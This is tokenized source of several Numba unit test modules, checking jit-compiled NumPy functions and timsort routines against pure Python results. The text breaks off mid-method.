<s> from __future__ import print_function <EOL> import numba . unittest_support as unittest <EOL> from numba import jit <EOL> class TestFuncInterface ( unittest . TestCase ) : <EOL> def test_jit_function_docstring ( self ) : <EOL> def add ( x , y ) : <EOL> '''<STR_LIT>''' <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __doc__ , '<STR_LIT>' ) <EOL> def test_jit_function_name ( self ) : <EOL> def add ( x , y ) : <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __name__ , '<STR_LIT>' ) <EOL> def test_jit_function_module ( self ) : <EOL> def add ( x , y ) : <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __module__ , add . __module__ ) <EOL> def test_jit_function_code_object ( self ) : <EOL> def add ( x , y ) : <EOL> return x + y <EOL> c_add = jit ( add ) <EOL> self . assertEqual ( c_add . __code__ , add . __code__ ) <EOL> self . assertEqual ( c_add . func_code , add . __code__ ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from __future__ import print_function , absolute_import , division <EOL> import itertools <EOL> import math <EOL> import sys <EOL> import numpy as np <EOL> from numba import unittest_support as unittest <EOL> from numba . compiler import compile_isolated , Flags , utils <EOL> from numba import jit , typeof , types <EOL> from numba . numpy_support import version as np_version <EOL> from . support import TestCase , CompilationCache <EOL> no_pyobj_flags = Flags ( ) <EOL> no_pyobj_flags . set ( "<STR_LIT>" ) <EOL> def sinc ( x ) : <EOL> return np . sinc ( x ) <EOL> def angle1 ( x ) : <EOL> return np . angle ( x ) <EOL> def angle2 ( x , deg ) : <EOL> return np . angle ( x , deg ) <EOL> def diff1 ( a ) : <EOL> return np . diff ( a ) <EOL> def diff2 ( a , n ) : <EOL> return np . diff ( a , n ) <EOL> def bincount1 ( a ) : <EOL> return np . bincount ( a ) <EOL> def bincount2 ( a , w ) : <EOL> return np . bincount ( a , weights = w ) <EOL> def searchsorted ( a , v ) : <EOL> return np . searchsorted ( a , v ) <EOL> def digitize ( * args ) : <EOL> return np . digitize ( * args ) <EOL> def histogram ( * args ) : <EOL> return np . histogram ( * args ) <EOL> class TestNPFunctions ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . ccache = CompilationCache ( ) <EOL> self . rnd = np . random . RandomState ( <NUM_LIT> ) <EOL> def run_unary ( self , pyfunc , x_types , x_values , flags = no_pyobj_flags , <EOL> func_extra_types = None , func_extra_args = None , <EOL> ignore_sign_on_zero = False , abs_tol = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for tx , vx in zip ( x_types , x_values ) : <EOL> if func_extra_args is None : <EOL> func_extra_types = func_extra_args = [ ( ) ] <EOL> for xtypes , xargs in zip ( func_extra_types , func_extra_args ) : <EOL> cr = self . ccache . compile ( pyfunc , ( tx , ) + xtypes , <EOL> flags = flags ) <EOL> cfunc = cr . entry_point <EOL> got = cfunc ( vx , * xargs ) <EOL> expected = pyfunc ( vx , * xargs ) <EOL> try : <EOL> scalty = tx . dtype <EOL> except AttributeError : <EOL> scalty = tx <EOL> prec = ( '<STR_LIT>' <EOL> if scalty in ( types . float32 , types . complex64 ) <EOL> else '<STR_LIT>' ) <EOL> msg = '<STR_LIT>' % ( vx , prec ) <EOL> self . assertPreciseEqual ( got , expected , <EOL> prec = prec , <EOL> msg = msg , <EOL> ignore_sign_on_zero = <EOL> ignore_sign_on_zero , <EOL> abs_tol = abs_tol , ** kwargs ) <EOL> def test_sinc ( self ) : <EOL> """<STR_LIT>""" <EOL> isoz = True <EOL> tol = "<STR_LIT>" <EOL> pyfunc = sinc <EOL> def check ( x_types , x_values , ** kwargs ) : <EOL> self . run_unary ( pyfunc , x_types , x_values , <EOL> ignore_sign_on_zero = isoz , abs_tol = tol , <EOL> ** kwargs ) <EOL> x_values = [ <NUM_LIT:1.> , - <NUM_LIT:1.> , <NUM_LIT:0.0> , - <NUM_LIT:0.0> , <NUM_LIT:0.5> , - <NUM_LIT:0.5> , <NUM_LIT:5> , - <NUM_LIT:5> , <NUM_LIT> , - <NUM_LIT> ] <EOL> x_types = [ types . float32 , types . float64 ] * ( len ( x_values ) // <NUM_LIT:2> ) <EOL> check ( x_types , x_values ) <EOL> x_values = [ np . array ( x_values , dtype = np . float64 ) ] <EOL> x_types = [ typeof ( v ) for v in x_values ] <EOL> check ( x_types , x_values ) <EOL> x_values = [ <NUM_LIT:1.> + <NUM_LIT> , - <NUM_LIT:1> + <NUM_LIT> , <NUM_LIT:0.0> + <NUM_LIT> , - <NUM_LIT:0.0> + <NUM_LIT> , <NUM_LIT:0> + <NUM_LIT> , <NUM_LIT:0> - <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , <EOL> - <NUM_LIT:0.5> + <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , - <NUM_LIT:0.5> - <NUM_LIT> , <NUM_LIT:5> + <NUM_LIT> , - <NUM_LIT:5> - <NUM_LIT> , <EOL> <NUM_LIT> + <NUM_LIT> , - <NUM_LIT> + <NUM_LIT> , <NUM_LIT> , + ( <NUM_LIT:0> - <NUM_LIT> ) <EOL> ] <EOL> x_types = [ types . complex64 , types . complex128 ] * ( len ( x_values ) // <NUM_LIT:2> ) <EOL> check ( x_types , x_values , ulps = <NUM_LIT:2> ) <EOL> x_values = [ np . array ( x_values , dtype = np . complex128 ) ] <EOL> x_types = [ typeof ( v ) for v in x_values ] <EOL> check ( x_types , x_values , ulps = <NUM_LIT:2> ) <EOL> def test_angle ( self , flags = no_pyobj_flags ) : <EOL> """<STR_LIT>""" <EOL> pyfunc1 = angle1 <EOL> pyfunc2 = angle2 <EOL> def check ( x_types , x_values ) : <EOL> self . run_unary ( pyfunc1 , x_types , x_values ) <EOL> xtra_values = [ ( True , ) , ( False , ) ] <EOL> xtra_types = [ ( types . bool_ , ) ] * len ( xtra_values ) <EOL> self . run_unary ( pyfunc2 , x_types , x_values , <EOL> func_extra_types = xtra_types , <EOL> func_extra_args = xtra_values , ) <EOL> x_values = [ <NUM_LIT:1.> , - <NUM_LIT:1.> , <NUM_LIT:0.0> , - <NUM_LIT:0.0> , <NUM_LIT:0.5> , - <NUM_LIT:0.5> , <NUM_LIT:5> , - <NUM_LIT:5> ] <EOL> x_types = [ types . float32 , types . float64 ] * ( len ( x_values ) // <NUM_LIT:2> + <NUM_LIT:1> ) <EOL> check ( x_types , x_values ) <EOL> x_values = [ np . array ( x_values , dtype = np . float64 ) ] <EOL> x_types = [ typeof ( v ) for v in x_values ] <EOL> check ( x_types , x_values ) <EOL> x_values = [ <NUM_LIT:1.> + <NUM_LIT> , - <NUM_LIT:1> + <NUM_LIT> , <NUM_LIT:0.0> + <NUM_LIT> , - <NUM_LIT:0.0> + <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , <EOL> - <NUM_LIT:0.5> + <NUM_LIT> , <NUM_LIT:0.5> + <NUM_LIT> , - <NUM_LIT:0.5> - <NUM_LIT> , <NUM_LIT:5> + <NUM_LIT> , - <NUM_LIT:5> - <NUM_LIT> ] <EOL> x_types = [ types . complex64 , types . complex128 ] * ( len ( x_values ) // <NUM_LIT:2> + <NUM_LIT:1> ) <EOL> check ( x_types , x_values ) <EOL> x_values = np . array ( x_values ) <EOL> x_types = [ types . complex64 , types . complex128 ] <EOL> check ( x_types , x_values ) <EOL> def diff_arrays ( self ) : <EOL> """<STR_LIT>""" <EOL> a = np . arange ( <NUM_LIT:12> ) ** <NUM_LIT:3> <EOL> yield a <EOL> b = a . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> yield b <EOL> c = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:4> ) ) ** <NUM_LIT:3> <EOL> yield c <EOL> def test_diff1 ( self ) : <EOL> pyfunc = diff1 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for arr in self . diff_arrays ( ) : <EOL> expected = pyfunc ( arr ) <EOL> got = cfunc ( arr ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> a = np . array ( <NUM_LIT> ) <EOL> with self . assertTypingError ( ) : <EOL> cfunc ( a ) <EOL> def test_diff2 ( self ) : <EOL> pyfunc = diff2 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for arr in self . diff_arrays ( ) : <EOL> size = arr . shape [ - <NUM_LIT:1> ] <EOL> for n in ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , size - <NUM_LIT:1> , size , size + <NUM_LIT:1> , <NUM_LIT> ) : <EOL> expected = pyfunc ( arr , n ) <EOL> got = cfunc ( arr , n ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> arr = np . array ( <NUM_LIT> ) <EOL> with self . assertTypingError ( ) : <EOL> cfunc ( arr , <NUM_LIT:1> ) <EOL> arr = np . arange ( <NUM_LIT:10> ) <EOL> for n in ( - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT> ) : <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( arr , n ) <EOL> self . assertIn ( "<STR_LIT>" , str ( raises . exception ) ) <EOL> def bincount_sequences ( self ) : <EOL> """<STR_LIT>""" <EOL> a = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:20> ] <EOL> b = np . array ( [ <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT:5> ] ) <EOL> c = self . rnd . randint ( <NUM_LIT:0> , <NUM_LIT:100> , size = <NUM_LIT> ) . astype ( np . int8 ) <EOL> return ( a , b , c ) <EOL> def test_bincount1 ( self ) : <EOL> pyfunc = bincount1 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for seq in self . bincount_sequences ( ) : <EOL> expected = pyfunc ( seq ) <EOL> got = cfunc ( seq ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( [ <NUM_LIT:2> , - <NUM_LIT:1> ] ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( raises . exception ) ) <EOL> def test_bincount2 ( self ) : <EOL> pyfunc = bincount2 <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> for seq in self . bincount_sequences ( ) : <EOL> w = [ math . sqrt ( x ) - <NUM_LIT:2> for x in seq ] <EOL> for weights in ( w , np . array ( w ) ) : <EOL> expected = pyfunc ( seq , weights ) <EOL> got = cfunc ( seq , weights ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( [ <NUM_LIT:2> , - <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( raises . exception ) ) <EOL> with self . assertRaises ( ValueError ) as raises : <EOL> cfunc ( [ <NUM_LIT:2> , - <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> str ( raises . exception ) ) <EOL> def test_searchsorted ( self ) : <EOL> pyfunc = searchsorted <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> def check ( a , v ) : <EOL> expected = pyfunc ( a , v ) <EOL> got = cfunc ( a , v ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> bins = np . arange ( <NUM_LIT:5> ) ** <NUM_LIT:2> <EOL> values = np . arange ( <NUM_LIT:20> ) - <NUM_LIT:1> <EOL> for a in ( bins , list ( bins ) ) : <EOL> for v in values : <EOL> check ( a , v ) <EOL> for v in ( values , values . reshape ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) ) : <EOL> check ( a , v ) <EOL> check ( a , list ( values ) ) <EOL> bins = np . float64 ( list ( bins ) + [ float ( '<STR_LIT>' ) ] * <NUM_LIT:7> ) / <NUM_LIT> <EOL> values = np . arange ( <NUM_LIT:20> ) - <NUM_LIT:0.5> <EOL> for a in ( bins , list ( bins ) ) : <EOL> for v in values : <EOL> check ( a , v ) <EOL> for v in ( values , values . reshape ( ( <NUM_LIT:4> , <NUM_LIT:5> ) ) ) : <EOL> check ( a , v ) <EOL> check ( a , list ( values ) ) <EOL> def test_digitize ( self ) : <EOL> pyfunc = digitize <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> def check ( * args ) : <EOL> expected = pyfunc ( * args ) <EOL> got = cfunc ( * args ) <EOL> self . assertPreciseEqual ( expected , got ) <EOL> values = np . float64 ( ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <EOL> float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) ) ) <EOL> assert len ( values ) == <NUM_LIT:12> <EOL> self . rnd . shuffle ( values ) <EOL> bins1 = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> ] ) <EOL> bins2 = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) ] ) <EOL> bins3 = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) ] <EOL> + [ float ( '<STR_LIT>' ) ] * <NUM_LIT:10> ) <EOL> if np_version >= ( <NUM_LIT:1> , <NUM_LIT:10> ) : <EOL> all_bins = [ bins1 , bins2 , bins3 ] <EOL> xs = [ values , values . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) ] <EOL> else : <EOL> all_bins = [ bins1 , bins2 ] <EOL> xs = [ values ] <EOL> for bins in all_bins : <EOL> bins . sort ( ) <EOL> for x in xs : <EOL> check ( x , bins ) <EOL> check ( x , bins [ : : - <NUM_LIT:1> ] ) <EOL> for bins in all_bins : <EOL> bins . sort ( ) <EOL> for right in ( True , False ) : <EOL> check ( values , bins , right ) <EOL> check ( values , bins [ : : - <NUM_LIT:1> ] , right ) <EOL> check ( list ( values ) , bins1 ) <EOL> def test_histogram ( self ) : <EOL> pyfunc = histogram <EOL> cfunc = jit ( nopython = True ) ( pyfunc ) <EOL> def check ( * args ) : <EOL> pyhist , pybins = pyfunc ( * args ) <EOL> chist , cbins = cfunc ( * args ) <EOL> self . assertPreciseEqual ( pyhist , chist ) <EOL> self . assertPreciseEqual ( pybins , cbins , prec = '<STR_LIT>' , ulps = <NUM_LIT:2> ) <EOL> def check_values ( values ) : <EOL> bins = np . float64 ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:8> ] ) <EOL> check ( values , bins ) <EOL> check ( values . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) ) , bins ) <EOL> check ( values , <NUM_LIT:7> ) <EOL> check ( values , <NUM_LIT:7> , ( <NUM_LIT:1.0> , <NUM_LIT> ) ) <EOL> check ( values ) <EOL> values = np . float64 ( ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:8> , <EOL> <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:1.0> , - <NUM_LIT:0.0> ) ) <EOL> assert len ( values ) == <NUM_LIT:12> <EOL> self . rnd . shuffle ( values ) <EOL> check_values ( values ) </s>
<s> from __future__ import print_function <EOL> import copy <EOL> import itertools <EOL> import math <EOL> import random <EOL> import sys <EOL> import numpy as np <EOL> from numba . compiler import compile_isolated , Flags <EOL> from numba import jit , types , utils <EOL> import numba . unittest_support as unittest <EOL> from numba import testing <EOL> from . support import TestCase , MemoryLeakMixin , tag <EOL> from numba . targets . quicksort import make_py_quicksort , make_jit_quicksort <EOL> from . timsort import make_py_timsort , make_jit_timsort , MergeRun <EOL> def make_temp_list ( keys , n ) : <EOL> return [ keys [ <NUM_LIT:0> ] ] * n <EOL> def make_temp_array ( keys , n ) : <EOL> return np . empty ( n , keys . dtype ) <EOL> py_list_timsort = make_py_timsort ( make_temp_list ) <EOL> py_array_timsort = make_py_timsort ( make_temp_array ) <EOL> jit_list_timsort = make_jit_timsort ( make_temp_list ) <EOL> jit_array_timsort = make_jit_timsort ( make_temp_array ) <EOL> py_quicksort = make_py_quicksort ( ) <EOL> jit_quicksort = make_jit_quicksort ( ) <EOL> def sort_usecase ( val ) : <EOL> val . sort ( ) <EOL> def sorted_usecase ( val ) : <EOL> return sorted ( val ) <EOL> def sorted_reverse_usecase ( val , b ) : <EOL> return sorted ( val , reverse = b ) <EOL> def np_sort_usecase ( val ) : <EOL> return np . sort ( val ) <EOL> def list_sort_usecase ( n ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> l = [ ] <EOL> for i in range ( n ) : <EOL> l . append ( np . random . random ( ) ) <EOL> ll = l [ : ] <EOL> ll . sort ( ) <EOL> return l , ll <EOL> def list_sort_reverse_usecase ( n , b ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> l = [ ] <EOL> for i in range ( n ) : <EOL> l . append ( np . random . random ( ) ) <EOL> ll = l [ : ] <EOL> ll . sort ( reverse = b ) <EOL> return l , ll <EOL> class BaseSortingTest ( object ) : <EOL> def random_list ( self , n , offset = <NUM_LIT:10> ) : <EOL> random . seed ( <NUM_LIT> ) <EOL> l = list ( range ( offset , offset + n ) ) <EOL> random . shuffle ( l ) <EOL> return l <EOL> def sorted_list ( self , n , offset = <NUM_LIT:10> ) : <EOL> return list ( range ( offset , offset + n ) ) <EOL> def revsorted_list ( self , n , offset = <NUM_LIT:10> ) : <EOL> return list ( range ( offset , offset + n ) ) [ : : - <NUM_LIT:1> ] <EOL> def initially_sorted_list ( self , n , m = None , offset = <NUM_LIT:10> ) : <EOL> if m is None : <EOL> m = n // <NUM_LIT:2> <EOL> l = self . sorted_list ( m , offset ) <EOL> l += self . random_list ( n - m , offset = l [ - <NUM_LIT:1> ] + offset ) <EOL> return l <EOL> def duprandom_list ( self , n , factor = None , offset = <NUM_LIT:10> ) : <EOL> random . seed ( <NUM_LIT> ) <EOL> if factor is None : <EOL> factor = int ( math . sqrt ( n ) ) <EOL> l = ( list ( range ( offset , offset + ( n // factor ) + <NUM_LIT:1> ) ) * ( factor + <NUM_LIT:1> ) ) [ : n ] <EOL> assert len ( l ) == n <EOL> random . shuffle ( l ) <EOL> return l <EOL> def dupsorted_list ( self , n , factor = None , offset = <NUM_LIT:10> ) : <EOL> if factor is None : <EOL> factor = int ( math . sqrt ( n ) ) <EOL> l = ( list ( range ( offset , offset + ( n // factor ) + <NUM_LIT:1> ) ) * ( factor + <NUM_LIT:1> ) ) [ : n ] <EOL> assert len ( l ) == n , ( len ( l ) , n ) <EOL> l . sort ( ) <EOL> return l <EOL> def assertSorted ( self , orig , result ) : <EOL> self . assertEqual ( len ( result ) , len ( orig ) ) <EOL> self . assertEqual ( list ( result ) , sorted ( orig ) ) <EOL> def assertSortedValues ( self , orig , orig_values , result , result_values ) : <EOL> self . assertEqual ( len ( result ) , len ( orig ) ) <EOL> self . assertEqual ( list ( result ) , sorted ( orig ) ) <EOL> zip_sorted = sorted ( zip ( orig , orig_values ) , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> zip_result = list ( zip ( result , result_values ) ) <EOL> self . assertEqual ( zip_sorted , zip_result ) <EOL> for i in range ( len ( zip_result ) - <NUM_LIT:1> ) : <EOL> ( k1 , v1 ) , ( k2 , v2 ) = zip_result [ i ] , zip_result [ i + <NUM_LIT:1> ] <EOL> if k1 == k2 : <EOL> self . assertLess ( orig_values . index ( v1 ) , orig_values . index ( v2 ) ) <EOL> def fibo ( self ) : <EOL> a = <NUM_LIT:1> <EOL> b = <NUM_LIT:1> <EOL> while True : <EOL> yield a <EOL> a , b = b , a + b <EOL> def make_sample_sorted_lists ( self , n ) : <EOL> lists = [ ] <EOL> for offset in ( <NUM_LIT:20> , <NUM_LIT> ) : <EOL> lists . append ( self . sorted_list ( n , offset ) ) <EOL> lists . append ( self . dupsorted_list ( n , offset ) ) <EOL> return lists <EOL> def make_sample_lists ( self , n ) : <EOL> lists = [ ] <EOL> for offset in ( <NUM_LIT:20> , <NUM_LIT> ) : <EOL> lists . append ( self . sorted_list ( n , offset ) ) <EOL> lists . append ( self . dupsorted_list ( n , offset ) ) <EOL> lists . append ( self . revsorted_list ( n , offset ) ) <EOL> lists . append ( self . duprandom_list ( n , offset ) ) <EOL> return lists <EOL> class BaseTimsortTest ( BaseSortingTest ) : <EOL> def merge_init ( self , keys ) : <EOL> f = self . timsort . merge_init <EOL> return f ( keys ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_binarysort ( self ) : <EOL> n = <NUM_LIT:20> <EOL> def check ( l , n , start = <NUM_LIT:0> ) : <EOL> res = self . array_factory ( l ) <EOL> f ( res , res , <NUM_LIT:0> , n , start ) <EOL> self . assertSorted ( l , res ) <EOL> f = self . timsort . binarysort <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_binarysort_with_values ( self ) : <EOL> n = <NUM_LIT:20> <EOL> v = list ( range ( <NUM_LIT:100> , <NUM_LIT:100> + n ) ) <EOL> def check ( l , n , start = <NUM_LIT:0> ) : <EOL> res = self . array_factory ( l ) <EOL> res_v = self . array_factory ( v ) <EOL> f ( res , res_v , <NUM_LIT:0> , n , start ) <EOL> self . assertSortedValues ( l , v , res , res_v ) <EOL> f = self . timsort . binarysort <EOL> l = self . sorted_list ( n ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . initially_sorted_list ( n , n // <NUM_LIT:2> ) <EOL> check ( l , n ) <EOL> check ( l , n , n // <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n ) <EOL> check ( l , n ) <EOL> l = self . random_list ( n ) <EOL> check ( l , n ) <EOL> l = self . duprandom_list ( n ) <EOL> check ( l , n ) <EOL> def test_count_run ( self ) : <EOL> n = <NUM_LIT:16> <EOL> f = self . timsort . count_run <EOL> def check ( l , lo , hi ) : <EOL> n , desc = f ( self . array_factory ( l ) , lo , hi ) <EOL> if desc : <EOL> for k in range ( lo , lo + n - <NUM_LIT:1> ) : <EOL> a , b = l [ k ] , l [ k + <NUM_LIT:1> ] <EOL> self . assertGreater ( a , b ) <EOL> if lo + n < hi : <EOL> self . assertLessEqual ( l [ lo + n - <NUM_LIT:1> ] , l [ lo + n ] ) <EOL> else : <EOL> for k in range ( lo , lo + n - <NUM_LIT:1> ) : <EOL> a , b = l [ k ] , l [ k + <NUM_LIT:1> ] <EOL> self . assertLessEqual ( a , b ) <EOL> if lo + n < hi : <EOL> self . assertGreater ( l [ lo + n - <NUM_LIT:1> ] , l [ lo + n ] , l ) <EOL> l = self . sorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check ( l , <NUM_LIT:0> , n ) <EOL> check ( l , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check ( l , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> l = self . revsorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check ( l , <NUM_LIT:0> , n ) <EOL> check ( l , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check ( l , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> l = self . random_list ( n , offset = <NUM_LIT:100> ) <EOL> for i in range ( len ( l ) - <NUM_LIT:1> ) : <EOL> check ( l , i , n ) <EOL> l = self . duprandom_list ( n , offset = <NUM_LIT:100> ) <EOL> for i in range ( len ( l ) - <NUM_LIT:1> ) : <EOL> check ( l , i , n ) <EOL> @ tag ( '<STR_LIT>' ) <EOL> def test_gallop_left ( self ) : <EOL> n = <NUM_LIT:20> <EOL> f = self . timsort . gallop_left <EOL> def check ( l , key , start , stop , hint ) : <EOL> k = f ( key , l , start , stop , hint ) <EOL> self . assertGreaterEqual ( k , start ) <EOL> self . assertLessEqual ( k , stop ) <EOL> if k > start : <EOL> self . assertLess ( l [ k - <NUM_LIT:1> ] , key ) <EOL> if k < stop : <EOL> self . assertGreaterEqual ( l [ k ] , key ) <EOL> def check_all_hints ( l , key , start , stop ) : <EOL> for hint in range ( start , stop ) : <EOL> check ( l , key , start , stop , hint ) <EOL> def check_sorted_list ( l ) : <EOL> l = self . array_factory ( l ) <EOL> for key in ( l [ <NUM_LIT:5> ] , l [ <NUM_LIT:15> ] , l [ <NUM_LIT:0> ] , - <NUM_LIT:1000> , l [ - <NUM_LIT:1> ] , <NUM_LIT:1000> ) : <EOL> check_all_hints ( l , key , <NUM_LIT:0> , n ) <EOL> check_all_hints ( l , key , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check_all_hints ( l , key , <NUM_LIT:8> , n - <NUM_LIT:8> ) <EOL> l = self . sorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> l = self . dupsorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> def test_gallop_right ( self ) : <EOL> n = <NUM_LIT:20> <EOL> f = self . timsort . gallop_right <EOL> def check ( l , key , start , stop , hint ) : <EOL> k = f ( key , l , start , stop , hint ) <EOL> self . assertGreaterEqual ( k , start ) <EOL> self . assertLessEqual ( k , stop ) <EOL> if k > start : <EOL> self . assertLessEqual ( l [ k - <NUM_LIT:1> ] , key ) <EOL> if k < stop : <EOL> self . assertGreater ( l [ k ] , key ) <EOL> def check_all_hints ( l , key , start , stop ) : <EOL> for hint in range ( start , stop ) : <EOL> check ( l , key , start , stop , hint ) <EOL> def check_sorted_list ( l ) : <EOL> l = self . array_factory ( l ) <EOL> for key in ( l [ <NUM_LIT:5> ] , l [ <NUM_LIT:15> ] , l [ <NUM_LIT:0> ] , - <NUM_LIT:1000> , l [ - <NUM_LIT:1> ] , <NUM_LIT:1000> ) : <EOL> check_all_hints ( l , key , <NUM_LIT:0> , n ) <EOL> check_all_hints ( l , key , <NUM_LIT:1> , n - <NUM_LIT:1> ) <EOL> check_all_hints ( l , key , <NUM_LIT:8> , n - <NUM_LIT:8> ) <EOL> l = self . sorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> l = self . dupsorted_list ( n , offset = <NUM_LIT:100> ) <EOL> check_sorted_list ( l ) <EOL> def test_merge_compute_minrun ( self ) : <EOL> f = self . timsort . merge_compute_minrun <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:64> ) : <EOL> self . assertEqual ( f ( i ) , i ) <EOL> for i in range ( <NUM_LIT:6> , <NUM_LIT> ) : <EOL> if <NUM_LIT:2> ** i > sys . maxsize : <EOL> break <EOL> self . assertEqual ( f ( <NUM_LIT:2> ** i ) , <NUM_LIT:32> ) <EOL> for i in self . fibo ( ) : <EOL> if i < <NUM_LIT:64> : <EOL> continue <EOL> if i >= sys . maxsize : <EOL> break <EOL> k = f ( i ) <EOL> self . assertGreaterEqual ( k , <NUM_LIT:32> ) <EOL> self . assertLessEqual ( k , <NUM_LIT:64> ) <EOL> if i > <NUM_LIT> : <EOL> quot = i // k <EOL> p = <NUM_LIT:2> ** utils . bit_length ( quot ) <EOL> self . assertLess ( quot , p ) <EOL> self . assertGreaterEqual ( quot , <NUM_LIT> * p ) <EOL> def check_merge_lo_hi ( self , func , a , b ) : <EOL> na = len ( a ) <EOL> nb = len ( b ) <EOL> orig_keys = [ <NUM_LIT> ] + a + b + [ - <NUM_LIT> ] <EOL> keys = self . array_factory ( orig_keys ) <EOL> ms = self . merge_init ( keys ) <EOL> ssa = <NUM_LIT:1> <EOL> ssb = ssa + na <EOL> new_ms = func ( ms , keys , keys , ssa , na , ssb , nb ) <EOL> self . assertEqual ( keys [ <NUM_LIT:0> ] , orig_keys [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( keys [ - <NUM_LIT:1> ] , orig_keys [ - <NUM_LIT:1> ] ) <EOL> self . assertSorted ( orig_keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] , keys [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> self . assertGreaterEqual ( len ( new_ms . keys ) , len ( ms . keys ) ) <EOL> self . assertGreaterEqual ( len ( new_ms . values ) , len ( ms . values ) ) <EOL> self . assertIs ( new_ms . pending , ms . pending ) <EOL> self . assertGreaterEqual ( new_ms . min_gallop , <NUM_LIT:1> ) <EOL> def test_merge_lo_hi ( self ) : <EOL> f_lo = self . timsort . merge_lo <EOL> f_hi = self . timsort . merge_hi <EOL> for ( na , nb ) in [ ( <NUM_LIT:12> , <NUM_LIT:16> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:100> , <NUM_LIT> ) , ( <NUM_LIT:1000> , <NUM_LIT> ) ] : <EOL> for a , b in itertools . product ( self . make_sample_sorted_lists ( na ) , <EOL> self . make_sample_sorted_lists ( nb ) ) : <EOL> self . check_merge_lo_hi ( f_lo , a , b ) <EOL> self . 